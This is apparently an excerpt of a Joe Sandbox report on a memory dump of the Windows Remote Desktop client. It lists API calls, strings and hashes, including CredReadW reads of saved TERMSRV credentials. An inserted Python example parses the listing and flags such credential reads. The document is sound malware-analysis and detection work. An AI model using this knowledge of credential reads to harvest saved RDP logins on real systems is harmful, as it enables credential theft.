                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Item$MessageSendShowText$EnableFocus$ClientLongRectScreenmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1960074330-0
                                                                                                                                                                                    • Opcode ID: 7cebb4c21a3e4a99146d24985d836b1a546b6a9682fe837b4642bd316e7e43c9
                                                                                                                                                                                    • Instruction ID: 56a4454761027fcfeff792fa427434aa302af102c7719772b727c5ae37e63e5a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cebb4c21a3e4a99146d24985d836b1a546b6a9682fe837b4642bd316e7e43c9
                                                                                                                                                                                    • Instruction Fuzzy Hash: D641C270244704ABDB216BA1CD86F7E76AAEBC4B05F40042DF68AA61A1CBF16C019F51
APIs
  • Part of subcall function 009145D2: _vsnwprintf.MSVCRT ref: 00914604
• RegOpenKeyExW.ADVAPI32 ref: 0094E25E
• RegOpenKeyExW.ADVAPI32 ref: 0094E2BC
• RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,?), ref: 0094E316
• RegOpenKeyExW.ADVAPI32 ref: 0094E378
• RegCloseKey.ADVAPI32(?), ref: 0094E446
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 0091D87E: TraceMessage.ADVAPI32(?,00000000,0000002B,00908AB4,00000028,00000000,00000004,NULL,0000000A,0094BF7D,00000004,00000000,00000000,00000000,80070000,00000028), ref: 0091D8F1
• RegCloseKey.ADVAPI32(00000000), ref: 0094E494
Strings
• \, xrefs: 0094E1C1
• Unable to get AppContainer registry location., xrefs: 0094E223
• SOFTWARE\Microsoft\Terminal Server Client\%s, xrefs: 0094E187
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Open$Close$AddressEnumFreeHandleLibraryMessageModuleProcTrace_vsnwprintf
• String ID: SOFTWARE\Microsoft\Terminal Server Client\%s$Unable to get AppContainer registry location.$\
• API String ID: 1061991183-810003542
• Opcode ID: c0269e778303b2d26cff6c904a94f77cd31c2a358afa8639ceba57fce0daf549
• Instruction ID: 532bb943d26abb58ab8ed99de7a90dad1fd3facdc015b8395eadb114642dcf1f
• Opcode Fuzzy Hash: c0269e778303b2d26cff6c904a94f77cd31c2a358afa8639ceba57fce0daf549
• Instruction Fuzzy Hash: C2A1CC72218304AFDB2ADF64D858F667BE9BB48348F04485DFA45971A2C7B0DD80EF52
APIs
• memset.MSVCRT ref: 00955A4D
• LocalAlloc.KERNEL32(00000040,00000000,009032EC,00000000,00000000), ref: 00955B04
• LocalFree.KERNEL32(?,00000000), ref: 00955CF3
  • Part of subcall function 00964E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0096A020,00000000,00000000,00000000), ref: 00964E6E
  • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
Strings
• StringCchCopy failed, xrefs: 00955B98
• szTempScope, xrefs: 00955B2C
• Mandatory sensitive setting not present, xrefs: 00955AA3
• Settings in signscope and file do not match up, xrefs: 00955CC8
• Field in SignScope not found in store, xrefs: 00955C95
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Local$ActivityAllocControlEventFreeMessageTracememset
• String ID: Field in SignScope not found in store$Mandatory sensitive setting not present$Settings in signscope and file do not match up$StringCchCopy failed$szTempScope
• API String ID: 1105911404-2725555693
• Opcode ID: dec02388248f0a51d693eb66536e36c16f32382bdb57a048b419ffc5524091af
• Instruction ID: f1216e765acfcfead2ab7e5a5c3690bcfdcecdb66ca2547c14597416d80df183
• Opcode Fuzzy Hash: dec02388248f0a51d693eb66536e36c16f32382bdb57a048b419ffc5524091af
• Instruction Fuzzy Hash: 6E8146716047049FCB29DF15CC64BA577AABB85309F52809DEC49AB2A3DB71CD89CF80
APIs
• CreateWindowExW.USER32 ref: 0095D265
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0095D272
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
• LoadIconW.USER32 ref: 0095D2BE
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0095D2C8
Strings
• m_spViewer->Initialize failed, xrefs: 0095D3D9
• SrApiViewerAxContainerClass, xrefs: 0095D25F
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: ErrorLast$AddressCreateFreeHandleIconLibraryLoadModuleProcWindow
• String ID: SrApiViewerAxContainerClass$m_spViewer->Initialize failed
• API String ID: 1003384205-847840934
• Opcode ID: 47816ff53ef05b57bff3ef61e1b10a569cfad8ccfd8e86cc201754ae9ba8dd01
• Instruction ID: 5b52a0c67725575c89e65d545a233e7458a6cd027b91079618e37038fe6c9023
• Opcode Fuzzy Hash: 47816ff53ef05b57bff3ef61e1b10a569cfad8ccfd8e86cc201754ae9ba8dd01
• Instruction Fuzzy Hash: 8A51E1716193006FDB39CF169C09F253A9ABB49311F04405DF905AB5F2C775EC84EB86
APIs
• GetClassInfoW.USER32(?,TscShellDlg,?), ref: 00951038
• LoadIconW.USER32 ref: 0095106A
• LoadCursorW.USER32 ref: 00951079
• RegisterClassW.USER32(00002808), ref: 00951097
• GetLastError.KERNEL32 ref: 009510A2
• GetLastError.KERNEL32(?,00950E30), ref: 00951118
• UnregisterClassW.USER32(TscShellDlg,?,?,00950E30), ref: 00951147
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Class$ErrorLastLoad$CursorIconInfoRegisterUnregister
• String ID: "$TscShellDlg
• API String ID: 1263847228-207632914
• Opcode ID: 652c4fdb89eff4a911a221d4085c2cd1ca4652c1079e9f6fc706d24ca6e33fbc
• Instruction ID: 9c087e42e5739f1b76307557b8e989c6e29683eedc380554166bd22bbfd2cec9
• Opcode Fuzzy Hash: 652c4fdb89eff4a911a221d4085c2cd1ca4652c1079e9f6fc706d24ca6e33fbc
• Instruction Fuzzy Hash: B931C371A08344AFDB14DFA6DC08BAA7BEAAF48315F10405DF981A72E1CBB5D884DF51
APIs
• memset.MSVCRT ref: 00954A74
• LocalFree.KERNEL32(00000000,00000001), ref: 00954D85
  • Part of subcall function 00964E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0096A020,00000000,00000000,00000000), ref: 00964E6E
  • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
Strings
• Empty signscope field, xrefs: 00954D2D
• CRdpSettingsStore::VerifySenstitiveSettings failed, xrefs: 00954B98
• CRdpSettingsStore::VerifySignature failed, xrefs: 00954AB4
• CRdpSettingsStore::GenerateSecureSettingsBlob failed, xrefs: 00954BEB
• CRdpSettingsStore::InitializeSignature failed., xrefs: 00954AFC
• SignScope, xrefs: 00954B3C
• CRdpSettingsStore::SetUnsignedBlob failed, xrefs: 00954C53
• Signature verification failed, xrefs: 00954CA8
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: ActivityControlEventFreeLocalMessageTracememset
• String ID: CRdpSettingsStore::GenerateSecureSettingsBlob failed$CRdpSettingsStore::InitializeSignature failed.$CRdpSettingsStore::SetUnsignedBlob failed$CRdpSettingsStore::VerifySenstitiveSettings failed$CRdpSettingsStore::VerifySignature failed$Empty signscope field$SignScope$Signature verification failed
• API String ID: 521830283-4263419474
• Opcode ID: 6c862ae33d1f322f0906764e2205d4ee904b3491df555d0f10ce538643a203ab
• Instruction ID: 05513ca6b5111b82ab0bb65f69a07beb4ae245cd4c5bbe78ab37896e7b4fd8fe
• Opcode Fuzzy Hash: 6c862ae33d1f322f0906764e2205d4ee904b3491df555d0f10ce538643a203ab
• Instruction Fuzzy Hash: 85A1F332608340AFC766DF56D849F6A3BE9AB89319F050458FD419B2E2C771DC88DF92
APIs
• memset.MSVCRT ref: 00962B19
• memset.MSVCRT ref: 00962B2E
• memset.MSVCRT ref: 00962B4C
• memset.MSVCRT ref: 00962B67
  • Part of subcall function 00958E3E: ??2@YAPAXI@Z.MSVCRT ref: 00958E50
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 0094ADD3: LocalFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000), ref: 0094AE64
• LocalFree.KERNEL32(?,?,00000000,00000000,?,?,00000001,00000000,00000000,?,?,?,?,00000000,?), ref: 00962DFC
Strings
• CTscCredentialsQueryUi::CreateInstance failed!, xrefs: 00962C31
• GetCanonicalServerName failed!, xrefs: 00962C85
• SaveCreds failed!, xrefs: 00962DC7
• CTSCredManAssistant::CreateInstance failed!, xrefs: 00962BCE
• GetPromptTextId failed!, xrefs: 00962D1A
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: memset$Free$Local$??2@AddressHandleLibraryModuleProc
• String ID: CTSCredManAssistant::CreateInstance failed!$CTscCredentialsQueryUi::CreateInstance failed!$GetCanonicalServerName failed!$GetPromptTextId failed!$SaveCreds failed!
• API String ID: 22622411-1265546757
• Opcode ID: 62eb2558b8b63c640145e18fdda700a63b2785bd5aeb618d09ba214954f3d0a3
• Instruction ID: 2fca85ef15345c83b891fea94aa08e4290ee18032f5f5e16edda720185b21a24
• Opcode Fuzzy Hash: 62eb2558b8b63c640145e18fdda700a63b2785bd5aeb618d09ba214954f3d0a3
• Instruction Fuzzy Hash: 7D91FF71A08708AEDB26CFA0CC96FEA77BDEB95344F0000A9F506A7091DA71DD85DB61
APIs
• LocalAlloc.KERNEL32(00000040,0000004C,00000000,00000100,?,TERMSRV,?), ref: 0095AA8A
• memset.MSVCRT ref: 0095AAE3
• LocalAlloc.KERNEL32(00000040,00000004,00000006), ref: 0095ABF1
• LocalFree.KERNEL32(00000000,00000000), ref: 0095AC9D
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 0090F9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,00901728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,0090FBF2,0091396B), ref: 0090FA1C
• LocalFree.KERNEL32(00000000,00000000), ref: 0095ACB7
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Local$Free$Alloc$AddressHandleLibraryMessageModuleProcTracememset
• String ID: PSEC_WINNT_AUTH_IDENTITY_EX2$PWSTR$SspiPrepareForCredRead failed$StringCbCopy failed$StringCbLength failed
• API String ID: 1071269685-1201727769
• Opcode ID: 7059e913026ab9f0ffcc1ba38655fe188c199ee0435180fb6ebd5e60115f54a0
• Instruction ID: 4bee86cd57885eb353fc3baa16de05f14f1f70917e2f748841bec85efce29e8e
• Opcode Fuzzy Hash: 7059e913026ab9f0ffcc1ba38655fe188c199ee0435180fb6ebd5e60115f54a0
• Instruction Fuzzy Hash: 86615B72904304AFC726CF56C845F6A7BAAEF49310F154199FD40AB2A2C7B5CD44EB8A
APIs
• PostMessageW.USER32 ref: 009610DC
• EndDialog.USER32 ref: 009610E5
• GetSystemMetrics.USER32(0000000C,?,00000000,?,00000002), ref: 0096114D
• GetSystemMetrics.USER32(0000000B,00000000,?,00000000,?,00000002), ref: 00961156
• GetDlgItem.USER32(?,0000139E), ref: 00961165
• GetLastError.KERNEL32(00000000,?,00000000,?,00000002), ref: 00961177
• SetDlgItemTextW.USER32(?,0000139D,?,00000000,?,00000000,?,00000002), ref: 009611CF
• GetLastError.KERNEL32(?,00000000,?,00000002), ref: 009611D9
• SendDlgItemMessageW.USER32(?,0000139F,0000040A,00000001,00000023,?,00000000,?,00000002), ref: 00961222
• ShowWindow.USER32(?,00000005), ref: 0096122D
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Item$ErrorLastMessageMetricsSystem$DialogPostSendShowTextWindow
• String ID:
• API String ID: 3391194569-0
• Opcode ID: 2576428fc0e93274a36b6724b1e79f9ab282fd39acc10e3cf8dfc1d8b7615997
• Instruction ID: d74631e67e19b64b8597ba6432f944bf8af2d9a09d8217fe50d4f5b818d49548
• Opcode Fuzzy Hash: 2576428fc0e93274a36b6724b1e79f9ab282fd39acc10e3cf8dfc1d8b7615997
• Instruction Fuzzy Hash: D341C4B1218301BFEB189F64DD9AF3637A9EB49701F09411CFA06D65A1CBB4DC90EB61
APIs
• GetDlgItem.USER32(00000000,00003309), ref: 009358A7
• IsDlgButtonChecked.USER32(00000000,00003310,?,0093582B,?,00000000), ref: 009358C0
• GetDlgItem.USER32(00000000,00003309), ref: 00935945
• EnableWindow.USER32(00000000), ref: 0093594C
• SendMessageW.USER32(?,0000040A,00000001,00000000), ref: 00935964
• SendMessageW.USER32(?,00000405,00000001,00000000), ref: 00935971
• SendMessageW.USER32(00000000,00000400,00000000,00000000), ref: 0093598C
• SendMessageW.USER32(00000000,00000405,00000001,?), ref: 009359A5
• GetDlgItem.USER32(00000000,00003309), ref: 009359BB
• EnableWindow.USER32(00000000), ref: 009359C2
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: MessageSend$Item$EnableWindow$ButtonChecked
• String ID:
• API String ID: 1728075932-0
• Opcode ID: 8c07a64b21e2ef11943a576f67d4be300acc4bfb7376a0dca6cfd6a9f2bdffe1
• Instruction ID: ebe75ea67ab258df6b94911eb4f09d35b4a01f6a32cf48d4cdcbe7429bd91a93
• Opcode Fuzzy Hash: 8c07a64b21e2ef11943a576f67d4be300acc4bfb7376a0dca6cfd6a9f2bdffe1
• Instruction Fuzzy Hash: DB310471204704EFDB109F11CC99FBA3769EF89724F524029FA45AF1A0DBB1A902DF50
APIs
• GetLastError.KERNEL32(?,00000100), ref: 0091E3F1
  • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
• SysFreeString.OLEAUT32(?), ref: 0091E368
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
Strings
• Setting Remote Application's Name Failed!, xrefs: 0091E1BC
• Setting Remote Application's Program!, xrefs: 0091E20F
• _msReconnect, xrefs: 0091E2C8
• AddRemoteApplicationToQueueUi failed!, xrefs: 0091E4B7
• Setting Remote Application's Arguments!, xrefs: 0091E262
• GetTSRemoteApplication failed, xrefs: 0091E160
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: FreeMessageTrace$AddressErrorHandleLastLibraryModuleProcString
• String ID: AddRemoteApplicationToQueueUi failed!$GetTSRemoteApplication failed$Setting Remote Application's Arguments!$Setting Remote Application's Name Failed!$Setting Remote Application's Program!$_msReconnect
• API String ID: 3800867429-3388236451
• Opcode ID: fa0dc7036cac769e14185538ae754299b99793ef7995e783a4bf0cf8d20deea3
• Instruction ID: 7e4bdde59851fb30806668259586997101ad67de77efd28587c8ac2b495566af
• Opcode Fuzzy Hash: fa0dc7036cac769e14185538ae754299b99793ef7995e783a4bf0cf8d20deea3
• Instruction Fuzzy Hash: FDD19F71708348AFDB29DF14C899FA637EAAB89304F14486DFD459B2A2DA70DCC1DB11
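Worked example, added here by the editor; it is not part of the Joe Sandbox report and not code from the tool that generated the listing. It parses the plain-text function-listing layout used on this page (the APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin and Similarity sections of each function block) and then pulls out the direct Credential Manager calls, decoding the CredRead type argument and flagging blocks whose argument stacks carry a TERMSRV target. The sample listing inside the block is constructed from lines of this report with dummy hashes. Two assumptions: the breakdown of the snapshot file name into pid, stage, image base and process name is inferred from the names seen in this report, not from a documented format, and the credential-type table is the one from wincred.h.

```python
"""Parse Joe Sandbox IDA-plugin function listings (plain-text layout as shown in this report)."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two abbreviated function blocks in the report's own layout.
# API and string lines are copied from the mstsc.exe dump listing; hashes are omitted.
SAMPLE = """\
APIs
• CredReadW.ADVAPI32(?,00000006,00000000,00000000), ref: 009592D7
• GetLastError.KERNEL32(?,00959EF4,?,00000001,?,00000000,?,?,?,TERMSRV,?), ref: 009592E1
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
• CredFree.ADVAPI32(00000000,?,00959EF4,?,00000001,?,00000000,?,?,?,TERMSRV,?), ref: 009594E6
  • Part of subcall function 0095B1E5: memset.MSVCRT ref: 0095B20A
Strings
• SaveCreds failed!, xrefs: 00962DC7
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Cred$Free$Read
• String ID: SaveCreds failed!
• API String ID: 1-1
APIs
• PostMessageW.USER32 ref: 009610DC
• EndDialog.USER32 ref: 009610E5
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
"""

API_RE = re.compile(
    r"^\s*•\s+(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s+)?"
    r"(?P<name>[^\s.(]+)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$")
STR_RE = re.compile(r"^•\s+(?P<text>.*), xrefs:\s+(?P<ref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^•\s+(?P<key>[^:]+):\s*(?P<val>.*)$")
# Assumption: snapshot names read as hcaresult_<pid>_<stage>_<base>_<process>.jbxd,
# inferred from the names in this report, not from a documented Joe Sandbox format.
SNAP_RE = re.compile(r"hcaresult_(?P<pid>\d+)_(?P<stage>\d+)_(?P<base>[0-9A-Fa-f]+)_(?P<proc>.+)\.jbxd")
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# wincred.h credential types; CredRead's second argument.
CRED_TYPES = {1: "CRED_TYPE_GENERIC", 2: "CRED_TYPE_DOMAIN_PASSWORD", 3: "CRED_TYPE_DOMAIN_CERTIFICATE",
              4: "CRED_TYPE_DOMAIN_VISIBLE_PASSWORD", 5: "CRED_TYPE_GENERIC_CERTIFICATE",
              6: "CRED_TYPE_DOMAIN_EXTENDED"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int                    # call-site address in the dump
    subcall_of: Optional[int]   # callee address when this is a "Part of subcall" line


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # (text, xref address)
    meta: dict = field(default_factory=dict)     # key/value lines from the other sections


def parse_listing(text):
    """Split the listing into per-function blocks; a block starts at each 'APIs' header."""
    blocks, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            blocks.append(FunctionBlock())
            section = "APIs"
            continue
        if line in HEADERS:
            section = line
            continue
        if not blocks:
            continue
        cur = blocks[-1]
        if section == "APIs" and (m := API_RE.match(line)):
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.apis.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16),
                                    int(m["sub"], 16) if m["sub"] else None))
        elif section == "Strings" and (m := STR_RE.match(line)):
            cur.strings.append((m["text"], int(m["ref"], 16)))
        elif (m := KV_RE.match(line)):
            cur.meta[m["key"]] = m["val"]
    return blocks


def snapshot_info(block):
    """Decode pid, stage, image base and process name from the Snapshot File name (see SNAP_RE)."""
    m = SNAP_RE.search(block.meta.get("Snapshot File", ""))
    if not m:
        return None
    return {"pid": int(m["pid"]), "stage": int(m["stage"]),
            "base": int(m["base"], 16), "process": m["proc"]}


def credential_access(blocks):
    """Direct (non-subcall) Credential Manager calls per block, with the CredRead type decoded
    and a flag set when a TERMSRV target appears anywhere in the block's recorded arguments."""
    hits = []
    for i, b in enumerate(blocks):
        termsrv = any(a.startswith("TERMSRV") for api in b.apis for a in api.args)
        for api in b.apis:
            if api.subcall_of is not None or api.module != "ADVAPI32" or not api.name.startswith("Cred"):
                continue
            cred_type = None
            if api.name.startswith("CredRead") and len(api.args) > 1 and re.fullmatch(r"[0-9A-Fa-f]+", api.args[1]):
                cred_type = CRED_TYPES.get(int(api.args[1], 16), "unknown")
            hits.append({"block": i, "api": api.name, "ref": api.ref, "type": cred_type, "termsrv": termsrv})
    return hits


if __name__ == "__main__":
    for hit in credential_access(parse_listing(SAMPLE)):
        print(hit)
```

Run on the full listing, the helper reports CredReadW with type 6 (CRED_TYPE_DOMAIN_EXTENDED) next to a TERMSRV target, which is what a saved-RDP-credential lookup looks like. The class names in the strings (CTSCredManAssistant, CTscCredentialsQueryUi) and the mstsc snapshot name point to the RDP client's own credential handling rather than to the injected payload, so keep snapshot_info() next to each hit when a report mixes dumps from several processes and bases.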
APIs
• CredReadW.ADVAPI32(?,00000006,00000000,00000000), ref: 009592D7
• GetLastError.KERNEL32(?,00959EF4,?,00000001,?,00000000,?,?,?,TERMSRV,?), ref: 009592E1
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
• CredReadW.ADVAPI32(?,00000006,00000000,00000000), ref: 009593A5
• GetLastError.KERNEL32(?,00959EF4,?,00000001,?,00000000,?,?,?,TERMSRV,?), ref: 009593AF
• CredFree.ADVAPI32(00000000,?,00959EF4,?,00000001,?,00000000,?,?,?,TERMSRV,?), ref: 009594E6
• LocalFree.KERNEL32(00000000,?,00959EF4,?,00000001,?,00000000,?,?,?,TERMSRV,?), ref: 009594F1
  • Part of subcall function 0095B1E5: memset.MSVCRT ref: 0095B20A
                                                                                                                                                                                      • Part of subcall function 0095B1E5: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,?,?,00000100), ref: 0095B23A
                                                                                                                                                                                      • Part of subcall function 0095B1E5: VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003,?,?,00000100), ref: 0095B242
                                                                                                                                                                                      • Part of subcall function 0095B1E5: VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 0095B24F
                                                                                                                                                                                      • Part of subcall function 0095AA6B: LocalAlloc.KERNEL32(00000040,0000004C,00000000,00000100,?,TERMSRV,?), ref: 0095AA8A
                                                                                                                                                                                      • Part of subcall function 0095AA6B: LocalFree.KERNEL32(00000000,00000000), ref: 0095ACB7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free$CredLocal$ConditionErrorLastMaskRead$AddressAllocHandleInfoLibraryMessageModuleProcTraceVerifyVersionmemset
                                                                                                                                                                                    • String ID: GetTargetForExtednedCredential failed$StringCchCopy failed!
                                                                                                                                                                                    • API String ID: 1625013499-3322908828
                                                                                                                                                                                    • Opcode ID: a32057ce54fc74a086d25098d251cf7ab05a237318f6bbe38334092e80fae9b0
                                                                                                                                                                                    • Instruction ID: c365d4ff2670e6581e2209b824895c0da7c71bb63921496fbc88bbcc65904135
                                                                                                                                                                                    • Opcode Fuzzy Hash: a32057ce54fc74a086d25098d251cf7ab05a237318f6bbe38334092e80fae9b0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C710772A14364FFEB35CF5AD849F6A3AA9AB45315F054088FC00AB5B1C375CC89EB91
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                    • String ID: CreateItemMoniker failed$GetRunningObjectTable$QI(IMsRdpDeviceCollection2)$ROT->Register$dynusb:%d
                                                                                                                                                                                    • API String ID: 2296332203-1013186652
                                                                                                                                                                                    • Opcode ID: c55905bd849b5c0e454f69087bea65636e1a06078d7719a22e35b1c574d689be
                                                                                                                                                                                    • Instruction ID: e3ef4d05af560438eda3dca9177befa27131e78c98c8e4b5da23bb797b6cf113
                                                                                                                                                                                    • Opcode Fuzzy Hash: c55905bd849b5c0e454f69087bea65636e1a06078d7719a22e35b1c574d689be
